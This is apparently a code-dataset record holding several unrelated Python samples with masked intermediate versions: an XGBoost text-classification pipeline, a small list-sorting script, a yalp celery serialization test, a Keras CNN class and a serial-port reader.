TfidfVectorizer()\ntfidf_tr = tfidf.fit_transform(corpus_train).toarray()\ntfidf_test = tfidf.transform(corpus_test).toarray()\n\n##############################\n# Singular Value Decomposition\n##############################\n\nsvd = TruncatedSVD(n_components = 1000) # considering 98% variance in the Data\nsvd_tr = svd.fit_transform(tfidf_tr) # Fitting on cleaned training text data\nsvd_train = svd.transform(tfidf_test) # Transforming on cleaned testing text data\nsvd_tr = pd.DataFrame(svd_tr)\nsvd_test = pd.DataFrame(svd_train)\n#explainedvar = svd.explained_variance_ratio_\n#exp_var = explainedvar.cumsum()\n\n# -------------------------------------------- VARIANTS ---------------------------------------------\n\n####################\n# Dependent Variable\n####################\n\ny = train_var['Class'].values\ny = y-1\n\n#################\n# Merging Dataset\n#################\n\n# Merging the dataset for data preparation and feature engineering\n\ndf = pd.concat([train_var, test_var], axis = 0)\ndf = df.drop(['ID'], axis = 1)\ndf['ID'] = range(df.shape[0])\ndf.index = range(df.shape[0])\ndf_text = pd.concat([train_df, test_df], axis = 0)\ndf_text = df_text.drop('ID', axis = 1)\ndf_text['ID'] = range(df_text.shape[0])\ndf_text.index = range(df_text.shape[0])\ndf_all = pd.merge(df, df_text, how = 'left', on = 'ID')\n\n\n################\n# Missing Values\n################\n\n# Checking for missing values\n\ncolumn_list = train_var.columns.values.tolist()\nmissing_values = pd.DataFrame()\nmissing_values['Columns'] = column_list\nfor i in column_list:\n missing_values['No. of missing values'] = train_var[i].isnull().values.ravel().sum()\n\n# There are no missing values.\n\n#######################\n# Categorical Variables\n#######################\n\n# Extracting the columns having categorical Variables.\n\ncolumn_list = df.columns\ncategorical_columns = []\nfor i in column_list:\n if df[i].dtype == 'O':\n categorical_columns.append(i)\n\n# Encoding the columns with categorical variables\n\n# Label Encoding\n\nfor i in categorical_columns:\n le = LabelEncoder()\n df[i + '_le'] = le.fit_transform(df[i])\n df[i + '_length'] = df[i].map(lambda x: len(str(x)))\n\n# Feature Engineering\n\ndf_all['Gene_Share'] = df_all.apply(lambda r: sum([1 for w in r['Gene'].split(' ') if w in r['Text'].split(' ')]), axis=1)\ndf_all['Variation_Share'] = df_all.apply(lambda r: sum([1 for w in r['Variation'].split(' ') if w in r['Text'].split(' ')]), axis=1)\n \n###################\n# Splitting Dataset\n################### \n\ntrain = df_all.iloc[:len(train_var), :]\ntest = df_all.iloc[len(train_var):,:]\ntest.index = range(len(test_var))\ntrain = train.drop(['Gene', 'Variation', 'ID', 'Text', 'Class'], axis = 1)\ntest = test.drop(['Gene', 'Variation', 'Text', 'ID', 'Class'], axis = 1)\n\ntrain_final = pd.concat([train, svd_tr], axis = 1)\ntest_final = pd.concat([test, svd_test], axis = 1)\n\n#################\n# Standardization\n#################\n\nsc = StandardScaler()\ntrain_final = sc.fit_transform(train_final)\ntest_final = sc.transform(test_final)\ntrain_final = pd.DataFrame(train_final)\ntest_final = pd.DataFrame(test_final) \n\n# -------------------------------------------- MODEL ---------------------------------------------\n\n##################\n# XGBoost Matrix \n##################\n\ndtrain = xgb.DMatrix(train_final, y)\ndtest = xgb.DMatrix(test_final)\n\n##################\n# Cross-Validation \n##################\n\ndef docv(param, iterations, nfold):\n model_CV = xgb.cv(\n params = param,\n num_boost_round = iterations,\n nfold = nfold,\n dtrain = dtrain,\n seed = random.randint(1, 10000),\n early_stopping_rounds = 100,\n maximize = False,\n verbose_eval = 50)\n gc.collect()\n best = min(model_CV['test-mlogloss-mean'])\n best_iter = model_CV.shape[0]\n print (best)\n return (best_iter)\n\n#########\n# Testing \n#########\n\ndef doTest(param, iteration):\n X_tr, X_val, y_tr, y_val = train_test_split(train_final, y, test_size = 0.2, random_state = random.randint(1,1000))\n watchlist = [(xgb.DMatrix(X_tr, y_tr), 'train'), (xgb.DMatrix(X_val, y_val), 'validation')]\n model = xgb.train(\n params = param,\n dtrain = xgb.DMatrix(X_tr, y_tr),\n num_boost_round = iteration,\n evals = watchlist,\n verbose_eval = 50,\n early_stopping_rounds = 100)\n score = metrics.log_loss(y_val, model.predict(xgb.DMatrix(X_val)), labels = range(9))\n predicted_class = model.predict(dtest)\n print (score)\n return (predicted_class)\n\n#########\n# Bagging\n#########\n\ndef Bagging(N, params, best_iter):\n for i in range(N):\n param = params\n p = doTest(param, best_iter)\n if i == 0:\n preds = p.copy()\n else:\n preds = preds + p\n predictions = preds/N\n predictions = pd.DataFrame(predictions)\n return (predictions)\n\n###################\n# Running the Model\n###################\n\nparams = {\n 'eta': 0.02,\n 'max_depth': 6,\n 'objective': 'multi:softprob',\n 'eval_metric': 'mlogloss',\n 'silent': False,\n 'seed': random.randint(1,100),\n 'num_class': 9\n }\n\ncross_vali = docv(params, 10000, 5)\n\npredicted_class = Bagging(5, params, cross_vali)\n\n\n# -------------------------------------------- SUBMISSION ---------------------------------------------\n\nsub_file = pd.DataFrame()\nsub_file['ID'] = test_var['ID'].values\nSub_File = pd.concat([sub_file, predicted_class], axis = 1)\nSub_File.columns = ['ID', 'Class1', 'Class2', 'Class3', 'Class4', 'Class5', 'Class6', 'Class7', \n 'Class8', 'Class9']\nSub_File.to_csv(\"submission33.csv\", index = False)\n\n# -------------------------------------------- Project Layout ---------------------------------------------\n\n# 1) Text Cleaning\n# 2) TFIDF Vectorizer and Singular Value Decomposition\n# 3) Feature Engineering\n# 4) Building a Model and trying out different models\n# 5) Parameter Tuning\n# 6) Bagged Boosting ", "step-ids": [ 4, 5, 6, 7, 8 ] }
[ 4, 5, 6, 7, 8 ]
n = int(input()) lista = [] for i in range(n): inp = int(input()) lista.append(inp) lista.sort(reverse=True) print(lista[0]) print(lista[1])
normal
{ "blob_id": "b03960999fa30a55932ada7fbf731a3861b840ae", "index": 3496, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i in range(n):\n inp = int(input())\n lista.append(inp)\nlista.sort(reverse=True)\nprint(lista[0])\nprint(lista[1])\n", "step-3": "n = int(input())\nlista = []\nfor i in range(n):\n inp = int(input())\n lista.append(inp)\nlista.sort(reverse=True)\nprint(lista[0])\nprint(lista[1])\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
# vim: set et ts=4 sw=4 fileencoding=utf-8: ''' tests.integration.test_pipeline =============================== ''' import unittest import yaml import subprocess import time import pickle from datetime import datetime from amqp.exceptions import ChannelError from yalp.config import settings @unittest.skip('need to make this less brittle') class TestSerialization(unittest.TestCase): ''' Test that serialization via celery does not break ''' def setUp(self): settings.parsers = [{ 'passthrough': {} }] try: import socket import amqp self.connection = amqp.Connection() self.channel = self.connection.channel() except socket.error: from nose.plugins.skip import SkipTest raise SkipTest('Unable to connect to rabbitmq') self.now = datetime.now() self.event = { 'host': 'test_host', 'message': 'test message', 'date_time': self.now, } with open('/tmp/test_serial.yml', 'w') as config_file: config = { 'parsers': [{ 'passthrough': {} }], 'parser_workers': 1 } yaml.dump(config, config_file) self.parser_process = subprocess.Popen( 'scripts/yalp-parsers -c /tmp/test_serial.yml', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, ) def tearDown(self): self.channel.queue_delete(queue=settings.parser_queue) self.channel.queue_delete(queue='outputs') self.channel.close() self.connection.close() self.parser_process.kill() def test_default_serializer(self): from yalp.pipeline import tasks tasks.process_message.apply_async( args=[self.event], queue=settings.parser_queue, serializer=settings.celery_serializer, ) while True: try: message = self.channel.basic_get(queue='outputs') break except ChannelError: time.sleep(0.1) self.assertIsNotNone(message) event = pickle.loads(message.body)['message'] self.assertEqual('test message', event['message']) self.assertEqual(self.now, event['date_time'])
normal
{ "blob_id": "c945dc4df68fe110e8b38713fb77e2dce9efad8d", "index": 8418, "step-1": "<mask token>\n\n\n@unittest.skip('need to make this less brittle')\nclass TestSerialization(unittest.TestCase):\n <mask token>\n <mask token>\n <mask token>\n\n def test_default_serializer(self):\n from yalp.pipeline import tasks\n tasks.process_message.apply_async(args=[self.event], queue=settings\n .parser_queue, serializer=settings.celery_serializer)\n while True:\n try:\n message = self.channel.basic_get(queue='outputs')\n break\n except ChannelError:\n time.sleep(0.1)\n self.assertIsNotNone(message)\n event = pickle.loads(message.body)['message']\n self.assertEqual('test message', event['message'])\n self.assertEqual(self.now, event['date_time'])\n", "step-2": "<mask token>\n\n\n@unittest.skip('need to make this less brittle')\nclass TestSerialization(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n settings.parsers = [{'passthrough': {}}]\n try:\n import socket\n import amqp\n self.connection = amqp.Connection()\n self.channel = self.connection.channel()\n except socket.error:\n from nose.plugins.skip import SkipTest\n raise SkipTest('Unable to connect to rabbitmq')\n self.now = datetime.now()\n self.event = {'host': 'test_host', 'message': 'test message',\n 'date_time': self.now}\n with open('/tmp/test_serial.yml', 'w') as config_file:\n config = {'parsers': [{'passthrough': {}}], 'parser_workers': 1}\n yaml.dump(config, config_file)\n self.parser_process = subprocess.Popen(\n 'scripts/yalp-parsers -c /tmp/test_serial.yml', shell=True,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n def tearDown(self):\n self.channel.queue_delete(queue=settings.parser_queue)\n self.channel.queue_delete(queue='outputs')\n self.channel.close()\n self.connection.close()\n self.parser_process.kill()\n\n def test_default_serializer(self):\n from yalp.pipeline import tasks\n tasks.process_message.apply_async(args=[self.event], queue=settings\n .parser_queue, serializer=settings.celery_serializer)\n while True:\n try:\n message = self.channel.basic_get(queue='outputs')\n break\n except ChannelError:\n time.sleep(0.1)\n self.assertIsNotNone(message)\n event = pickle.loads(message.body)['message']\n self.assertEqual('test message', event['message'])\n self.assertEqual(self.now, event['date_time'])\n", "step-3": "<mask token>\n\n\n@unittest.skip('need to make this less brittle')\nclass TestSerialization(unittest.TestCase):\n \"\"\"\n Test that serialization via celery does not break\n \"\"\"\n\n def setUp(self):\n settings.parsers = [{'passthrough': {}}]\n try:\n import socket\n import amqp\n self.connection = amqp.Connection()\n self.channel = self.connection.channel()\n except socket.error:\n from nose.plugins.skip import SkipTest\n raise SkipTest('Unable to connect to rabbitmq')\n self.now = datetime.now()\n self.event = {'host': 'test_host', 'message': 'test message',\n 'date_time': self.now}\n with open('/tmp/test_serial.yml', 'w') as config_file:\n config = {'parsers': [{'passthrough': {}}], 'parser_workers': 1}\n yaml.dump(config, config_file)\n self.parser_process = subprocess.Popen(\n 'scripts/yalp-parsers -c /tmp/test_serial.yml', shell=True,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n def tearDown(self):\n self.channel.queue_delete(queue=settings.parser_queue)\n self.channel.queue_delete(queue='outputs')\n self.channel.close()\n self.connection.close()\n self.parser_process.kill()\n\n def test_default_serializer(self):\n from yalp.pipeline import tasks\n tasks.process_message.apply_async(args=[self.event], queue=settings\n .parser_queue, serializer=settings.celery_serializer)\n while True:\n try:\n message = self.channel.basic_get(queue='outputs')\n break\n except ChannelError:\n time.sleep(0.1)\n self.assertIsNotNone(message)\n event = pickle.loads(message.body)['message']\n self.assertEqual('test message', event['message'])\n self.assertEqual(self.now, event['date_time'])\n", "step-4": "<mask token>\nimport unittest\nimport yaml\nimport subprocess\nimport time\nimport pickle\nfrom datetime import datetime\nfrom amqp.exceptions import ChannelError\nfrom yalp.config import settings\n\n\n@unittest.skip('need to make this less brittle')\nclass TestSerialization(unittest.TestCase):\n \"\"\"\n Test that serialization via celery does not break\n \"\"\"\n\n def setUp(self):\n settings.parsers = [{'passthrough': {}}]\n try:\n import socket\n import amqp\n self.connection = amqp.Connection()\n self.channel = self.connection.channel()\n except socket.error:\n from nose.plugins.skip import SkipTest\n raise SkipTest('Unable to connect to rabbitmq')\n self.now = datetime.now()\n self.event = {'host': 'test_host', 'message': 'test message',\n 'date_time': self.now}\n with open('/tmp/test_serial.yml', 'w') as config_file:\n config = {'parsers': [{'passthrough': {}}], 'parser_workers': 1}\n yaml.dump(config, config_file)\n self.parser_process = subprocess.Popen(\n 'scripts/yalp-parsers -c /tmp/test_serial.yml', shell=True,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n def tearDown(self):\n self.channel.queue_delete(queue=settings.parser_queue)\n self.channel.queue_delete(queue='outputs')\n self.channel.close()\n self.connection.close()\n self.parser_process.kill()\n\n def test_default_serializer(self):\n from yalp.pipeline import tasks\n tasks.process_message.apply_async(args=[self.event], queue=settings\n .parser_queue, serializer=settings.celery_serializer)\n while True:\n try:\n message = self.channel.basic_get(queue='outputs')\n break\n except ChannelError:\n time.sleep(0.1)\n self.assertIsNotNone(message)\n event = pickle.loads(message.body)['message']\n self.assertEqual('test message', event['message'])\n self.assertEqual(self.now, event['date_time'])\n", "step-5": "# vim: set et ts=4 sw=4 fileencoding=utf-8:\n'''\ntests.integration.test_pipeline\n===============================\n'''\nimport unittest\n\nimport yaml\nimport subprocess\nimport time\nimport pickle\nfrom datetime import datetime\n\nfrom amqp.exceptions import ChannelError\n\nfrom yalp.config import settings\n\n\n@unittest.skip('need to make this less brittle')\nclass TestSerialization(unittest.TestCase):\n '''\n Test that serialization via celery does not break\n '''\n def setUp(self):\n settings.parsers = [{\n 'passthrough': {}\n }]\n try:\n import socket\n import amqp\n self.connection = amqp.Connection()\n self.channel = self.connection.channel()\n except socket.error:\n from nose.plugins.skip import SkipTest\n raise SkipTest('Unable to connect to rabbitmq')\n self.now = datetime.now()\n self.event = {\n 'host': 'test_host',\n 'message': 'test message',\n 'date_time': self.now,\n }\n with open('/tmp/test_serial.yml', 'w') as config_file:\n config = {\n 'parsers': [{\n 'passthrough': {}\n }],\n 'parser_workers': 1\n }\n yaml.dump(config, config_file)\n\n self.parser_process = subprocess.Popen(\n 'scripts/yalp-parsers -c /tmp/test_serial.yml',\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n\n def tearDown(self):\n self.channel.queue_delete(queue=settings.parser_queue)\n self.channel.queue_delete(queue='outputs')\n self.channel.close()\n self.connection.close()\n self.parser_process.kill()\n\n def test_default_serializer(self):\n from yalp.pipeline import tasks\n tasks.process_message.apply_async(\n args=[self.event],\n queue=settings.parser_queue,\n serializer=settings.celery_serializer,\n )\n while True:\n try:\n message = self.channel.basic_get(queue='outputs')\n break\n except ChannelError:\n time.sleep(0.1)\n self.assertIsNotNone(message)\n event = pickle.loads(message.body)['message']\n self.assertEqual('test message', event['message'])\n self.assertEqual(self.now, event['date_time'])\n\n", "step-ids": [ 2, 4, 5, 6, 7 ] }
[ 2, 4, 5, 6, 7 ]
# -*- coding: utf-8 -*- """ Created on Sun Sep 10 12:18:06 2017 @author: wqmike123 """ #%% build a simple CNN with gloVec as initial from keras.preprocessing import sequence from keras.models import Sequential from keras.layers import Dense, Dropout, Activation from keras.layers import Embedding from keras.layers import Conv1D, GlobalMaxPooling1D from keras import optimizers from keras.callbacks import EarlyStopping #%% class cnn: def __init__(self,maxlen,max_voc,embedweight = None,embedding_dims = 300, batch_size = 30,\ filters = 1024, conv_kernel = 3,hidden_dim = 2048,epochs = 20,\ output_dim = 2,dropout = 0.1,trainable=False): self.epochs = epochs self.batch_size = batch_size model = Sequential() # we start off with an efficient embedding layer which maps # our vocab indices into embedding_dims dimensions if not isinstance(embedweight,type(None)): model.add(Embedding(max_voc, embedding_dims, input_length=maxlen,weights = [embedweight],trainable = trainable)) else: model.add(Embedding(max_voc, embedding_dims, input_length=maxlen)) model.add(Dropout(dropout)) # we add a Convolution1D, which will learn filters # word group filters of size filter_length: model.add(Conv1D(filters, conv_kernel, padding='valid', activation='relu', strides=1)) # we use max pooling: model.add(GlobalMaxPooling1D()) # We add a vanilla hidden layer: model.add(Dense(hidden_dim)) model.add(Dropout(dropout)) model.add(Activation('relu')) model.add(Dense(512)) model.add(Dropout(dropout)) model.add(Activation('relu')) model.add(Dense(128)) model.add(Dropout(dropout)) model.add(Activation('relu')) # We project onto a single unit output layer, and squash it with a sigmoid: model.add(Dense(output_dim)) model.add(Activation('softmax')) opt = optimizers.SGD(lr=0.1,decay = 1e-4,momentum=0.9) #optimizers.adam(lr=0.01, decay=1e-6) model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy']) self.model = model @staticmethod def padding(x,maxlen): return sequence.pad_sequences(x, maxlen=maxlen) def fit(self,x_train,y_train,x_valid,y_valid,class_weight = None,earlyStopping = True): callback_ = None if earlyStopping: callback_ = EarlyStopping(monitor='val_loss', patience=10) if class_weight: self.model.fit(x_train, y_train, batch_size=self.batch_size, epochs=self.epochs, validation_data=(x_valid, y_valid),class_weight = class_weight, shuffle=True,callbacks=[callback_]) else: self.model.fit(x_train, y_train, batch_size=self.batch_size, epochs=self.epochs, validation_data=(x_valid, y_valid), shuffle=True,callbacks=[callback_]) # def fit(self,x_train,y_train,x_valid,y_valid,class_weight = None): # if class_weight: # self.model.fit(x_train, y_train, # batch_size=self.batch_size, # epochs=self.epochs, # validation_data=(x_valid, y_valid),class_weight = class_weight) # else: # self.model.fit(x_train, y_train, # batch_size=self.batch_size, # epochs=self.epochs, # validation_data=(x_valid, y_valid)) def load_weight(self,fadd): self.model.load_weights(fadd) def save_model(self,fpath): self.model.save(fpath) def predict(self,test_x): return self.model.predict(test_x)
normal
{ "blob_id": "e235be879cf8a00eb9f39f90859689a29b26f1c6", "index": 3161, "step-1": "<mask token>\n\n\nclass cnn:\n\n def __init__(self, maxlen, max_voc, embedweight=None, embedding_dims=\n 300, batch_size=30, filters=1024, conv_kernel=3, hidden_dim=2048,\n epochs=20, output_dim=2, dropout=0.1, trainable=False):\n self.epochs = epochs\n self.batch_size = batch_size\n model = Sequential()\n if not isinstance(embedweight, type(None)):\n model.add(Embedding(max_voc, embedding_dims, input_length=\n maxlen, weights=[embedweight], trainable=trainable))\n else:\n model.add(Embedding(max_voc, embedding_dims, input_length=maxlen))\n model.add(Dropout(dropout))\n model.add(Conv1D(filters, conv_kernel, padding='valid', activation=\n 'relu', strides=1))\n model.add(GlobalMaxPooling1D())\n model.add(Dense(hidden_dim))\n model.add(Dropout(dropout))\n model.add(Activation('relu'))\n model.add(Dense(512))\n model.add(Dropout(dropout))\n model.add(Activation('relu'))\n model.add(Dense(128))\n model.add(Dropout(dropout))\n model.add(Activation('relu'))\n model.add(Dense(output_dim))\n model.add(Activation('softmax'))\n opt = optimizers.SGD(lr=0.1, decay=0.0001, momentum=0.9)\n model.compile(loss='binary_crossentropy', optimizer=opt, metrics=[\n 'accuracy'])\n self.model = model\n <mask token>\n\n def fit(self, x_train, y_train, x_valid, y_valid, class_weight=None,\n earlyStopping=True):\n callback_ = None\n if earlyStopping:\n callback_ = EarlyStopping(monitor='val_loss', patience=10)\n if class_weight:\n self.model.fit(x_train, y_train, batch_size=self.batch_size,\n epochs=self.epochs, validation_data=(x_valid, y_valid),\n class_weight=class_weight, shuffle=True, callbacks=[callback_])\n else:\n self.model.fit(x_train, y_train, batch_size=self.batch_size,\n epochs=self.epochs, validation_data=(x_valid, y_valid),\n shuffle=True, callbacks=[callback_])\n <mask token>\n\n def save_model(self, fpath):\n self.model.save(fpath)\n <mask token>\n", "step-2": "<mask token>\n\n\nclass cnn:\n\n def __init__(self, maxlen, max_voc, embedweight=None, embedding_dims=\n 300, batch_size=30, filters=1024, conv_kernel=3, hidden_dim=2048,\n epochs=20, output_dim=2, dropout=0.1, trainable=False):\n self.epochs = epochs\n self.batch_size = batch_size\n model = Sequential()\n if not isinstance(embedweight, type(None)):\n model.add(Embedding(max_voc, embedding_dims, input_length=\n maxlen, weights=[embedweight], trainable=trainable))\n else:\n model.add(Embedding(max_voc, embedding_dims, input_length=maxlen))\n model.add(Dropout(dropout))\n model.add(Conv1D(filters, conv_kernel, padding='valid', activation=\n 'relu', strides=1))\n model.add(GlobalMaxPooling1D())\n model.add(Dense(hidden_dim))\n model.add(Dropout(dropout))\n model.add(Activation('relu'))\n model.add(Dense(512))\n model.add(Dropout(dropout))\n model.add(Activation('relu'))\n model.add(Dense(128))\n model.add(Dropout(dropout))\n model.add(Activation('relu'))\n model.add(Dense(output_dim))\n model.add(Activation('softmax'))\n opt = optimizers.SGD(lr=0.1, decay=0.0001, momentum=0.9)\n model.compile(loss='binary_crossentropy', optimizer=opt, metrics=[\n 'accuracy'])\n self.model = model\n <mask token>\n\n def fit(self, x_train, y_train, x_valid, y_valid, class_weight=None,\n earlyStopping=True):\n callback_ = None\n if earlyStopping:\n callback_ = EarlyStopping(monitor='val_loss', patience=10)\n if class_weight:\n self.model.fit(x_train, y_train, batch_size=self.batch_size,\n epochs=self.epochs, validation_data=(x_valid, y_valid),\n class_weight=class_weight, shuffle=True, callbacks=[callback_])\n else:\n self.model.fit(x_train, y_train, batch_size=self.batch_size,\n epochs=self.epochs, validation_data=(x_valid, y_valid),\n shuffle=True, callbacks=[callback_])\n <mask token>\n\n def save_model(self, fpath):\n self.model.save(fpath)\n\n def predict(self, test_x):\n return self.model.predict(test_x)\n", "step-3": "<mask token>\n\n\nclass cnn:\n\n def __init__(self, maxlen, max_voc, embedweight=None, embedding_dims=\n 300, batch_size=30, filters=1024, conv_kernel=3, hidden_dim=2048,\n epochs=20, output_dim=2, dropout=0.1, trainable=False):\n self.epochs = epochs\n self.batch_size = batch_size\n model = Sequential()\n if not isinstance(embedweight, type(None)):\n model.add(Embedding(max_voc, embedding_dims, input_length=\n maxlen, weights=[embedweight], trainable=trainable))\n else:\n model.add(Embedding(max_voc, embedding_dims, input_length=maxlen))\n model.add(Dropout(dropout))\n model.add(Conv1D(filters, conv_kernel, padding='valid', activation=\n 'relu', strides=1))\n model.add(GlobalMaxPooling1D())\n model.add(Dense(hidden_dim))\n model.add(Dropout(dropout))\n model.add(Activation('relu'))\n model.add(Dense(512))\n model.add(Dropout(dropout))\n model.add(Activation('relu'))\n model.add(Dense(128))\n model.add(Dropout(dropout))\n model.add(Activation('relu'))\n model.add(Dense(output_dim))\n model.add(Activation('softmax'))\n opt = optimizers.SGD(lr=0.1, decay=0.0001, momentum=0.9)\n model.compile(loss='binary_crossentropy', optimizer=opt, metrics=[\n 'accuracy'])\n self.model = model\n\n @staticmethod\n def padding(x, maxlen):\n return sequence.pad_sequences(x, maxlen=maxlen)\n\n def fit(self, x_train, y_train, x_valid, y_valid, class_weight=None,\n earlyStopping=True):\n callback_ = None\n if earlyStopping:\n callback_ = EarlyStopping(monitor='val_loss', patience=10)\n if class_weight:\n self.model.fit(x_train, y_train, batch_size=self.batch_size,\n epochs=self.epochs, validation_data=(x_valid, y_valid),\n class_weight=class_weight, shuffle=True, callbacks=[callback_])\n else:\n self.model.fit(x_train, y_train, batch_size=self.batch_size,\n epochs=self.epochs, validation_data=(x_valid, y_valid),\n shuffle=True, callbacks=[callback_])\n\n def load_weight(self, fadd):\n self.model.load_weights(fadd)\n\n def save_model(self, fpath):\n self.model.save(fpath)\n\n def predict(self, test_x):\n return self.model.predict(test_x)\n", "step-4": "<mask token>\nfrom keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation\nfrom keras.layers import Embedding\nfrom keras.layers import Conv1D, GlobalMaxPooling1D\nfrom keras import optimizers\nfrom keras.callbacks import EarlyStopping\n\n\nclass cnn:\n\n def __init__(self, maxlen, max_voc, embedweight=None, embedding_dims=\n 300, batch_size=30, filters=1024, conv_kernel=3, hidden_dim=2048,\n epochs=20, output_dim=2, dropout=0.1, trainable=False):\n self.epochs = epochs\n self.batch_size = batch_size\n model = Sequential()\n if not isinstance(embedweight, type(None)):\n model.add(Embedding(max_voc, embedding_dims, input_length=\n maxlen, weights=[embedweight], trainable=trainable))\n else:\n model.add(Embedding(max_voc, embedding_dims, input_length=maxlen))\n model.add(Dropout(dropout))\n model.add(Conv1D(filters, conv_kernel, padding='valid', activation=\n 'relu', strides=1))\n model.add(GlobalMaxPooling1D())\n model.add(Dense(hidden_dim))\n model.add(Dropout(dropout))\n model.add(Activation('relu'))\n model.add(Dense(512))\n model.add(Dropout(dropout))\n model.add(Activation('relu'))\n model.add(Dense(128))\n model.add(Dropout(dropout))\n model.add(Activation('relu'))\n model.add(Dense(output_dim))\n model.add(Activation('softmax'))\n opt = optimizers.SGD(lr=0.1, decay=0.0001, momentum=0.9)\n model.compile(loss='binary_crossentropy', optimizer=opt, metrics=[\n 'accuracy'])\n self.model = model\n\n @staticmethod\n def padding(x, maxlen):\n return sequence.pad_sequences(x, maxlen=maxlen)\n\n def fit(self, x_train, y_train, x_valid, y_valid, class_weight=None,\n earlyStopping=True):\n callback_ = None\n if earlyStopping:\n callback_ = EarlyStopping(monitor='val_loss', patience=10)\n if class_weight:\n self.model.fit(x_train, y_train, batch_size=self.batch_size,\n epochs=self.epochs, validation_data=(x_valid, y_valid),\n class_weight=class_weight, shuffle=True, callbacks=[callback_])\n else:\n self.model.fit(x_train, y_train, batch_size=self.batch_size,\n epochs=self.epochs, validation_data=(x_valid, y_valid),\n shuffle=True, callbacks=[callback_])\n\n def load_weight(self, fadd):\n self.model.load_weights(fadd)\n\n def save_model(self, fpath):\n self.model.save(fpath)\n\n def predict(self, test_x):\n return self.model.predict(test_x)\n", "step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 10 12:18:06 2017\n\n@author: wqmike123\n\"\"\"\n#%% build a simple CNN with gloVec as initial\nfrom keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation\nfrom keras.layers import Embedding\nfrom keras.layers import Conv1D, GlobalMaxPooling1D\nfrom keras import optimizers\nfrom keras.callbacks import EarlyStopping\n#%%\nclass cnn:\n\n def __init__(self,maxlen,max_voc,embedweight = None,embedding_dims = 300, batch_size = 30,\\\n filters = 1024, conv_kernel = 3,hidden_dim = 2048,epochs = 20,\\\n output_dim = 2,dropout = 0.1,trainable=False):\n\n self.epochs = epochs\n self.batch_size = batch_size\n model = Sequential()\n \n # we start off with an efficient embedding layer which maps\n # our vocab indices into embedding_dims dimensions\n if not isinstance(embedweight,type(None)):\n model.add(Embedding(max_voc,\n embedding_dims,\n input_length=maxlen,weights = [embedweight],trainable = trainable))\n else:\n model.add(Embedding(max_voc,\n embedding_dims,\n input_length=maxlen)) \n model.add(Dropout(dropout))\n \n # we add a Convolution1D, which will learn filters\n # word group filters of size filter_length:\n model.add(Conv1D(filters,\n conv_kernel,\n padding='valid',\n activation='relu',\n strides=1))\n # we use max pooling:\n model.add(GlobalMaxPooling1D())\n \n # We add a vanilla hidden layer:\n model.add(Dense(hidden_dim))\n model.add(Dropout(dropout))\n model.add(Activation('relu'))\n \n model.add(Dense(512))\n model.add(Dropout(dropout))\n model.add(Activation('relu'))\n \n model.add(Dense(128))\n model.add(Dropout(dropout))\n model.add(Activation('relu'))\n \n # We project onto a single unit output layer, and squash it with a sigmoid:\n model.add(Dense(output_dim))\n model.add(Activation('softmax'))\n opt = optimizers.SGD(lr=0.1,decay = 1e-4,momentum=0.9) #optimizers.adam(lr=0.01, decay=1e-6)\n model.compile(loss='binary_crossentropy',\n optimizer=opt,\n metrics=['accuracy'])\n self.model = model\n \n @staticmethod\n def padding(x,maxlen):\n return sequence.pad_sequences(x, maxlen=maxlen) \n \n def fit(self,x_train,y_train,x_valid,y_valid,class_weight = None,earlyStopping = True):\n callback_ = None\n if earlyStopping:\n callback_ = EarlyStopping(monitor='val_loss', patience=10)\n if class_weight:\n self.model.fit(x_train, y_train,\n batch_size=self.batch_size,\n epochs=self.epochs,\n validation_data=(x_valid, y_valid),class_weight = class_weight, shuffle=True,callbacks=[callback_])\n else:\n self.model.fit(x_train, y_train,\n batch_size=self.batch_size,\n epochs=self.epochs,\n validation_data=(x_valid, y_valid), shuffle=True,callbacks=[callback_]) \n# def fit(self,x_train,y_train,x_valid,y_valid,class_weight = None):\n# if class_weight:\n# self.model.fit(x_train, y_train,\n# batch_size=self.batch_size,\n# epochs=self.epochs,\n# validation_data=(x_valid, y_valid),class_weight = class_weight)\n# else:\n# self.model.fit(x_train, y_train,\n# batch_size=self.batch_size,\n# epochs=self.epochs,\n# validation_data=(x_valid, y_valid)) \n def load_weight(self,fadd):\n self.model.load_weights(fadd)\n \n def save_model(self,fpath):\n self.model.save(fpath)\n \n def predict(self,test_x):\n return self.model.predict(test_x)\n ", "step-ids": [ 4, 5, 7, 8, 9 ] }
[ 4, 5, 7, 8, 9 ]
# -*- coding: utf-8 -*- """ Created on Sun Apr 19 12:28:39 2020 @author: Ксения """ import serial import time import serial.tools.list_ports as lp def get_comports_list(): ports=list(lp.comports(include_links=False)) for p in ports: print(p.device) return ports def read_while_LF(com, timeout_ms=500): read_data ="" delay_ms=10 attempts=int(timeout_ms/delay_ms) for i in range(attempts): byte=com.read(size = 1).decode('utf-8') time.sleep(0.01) read_data+=byte if byte == '\n': break return read_data def read_write_gst(com, instruction): write_data=instruction.encode('utf-8') com.write(write_data) recieved = [] while(1): read_data=read_while_LF(com) if(read_data == ""): break recieved.append(read_data) return recieved com = serial.Serial('COM3', baudrate=115200, timeout=0.02) s=read_write_gst(com, "fil_test:start\r") print(s) com.close()
normal
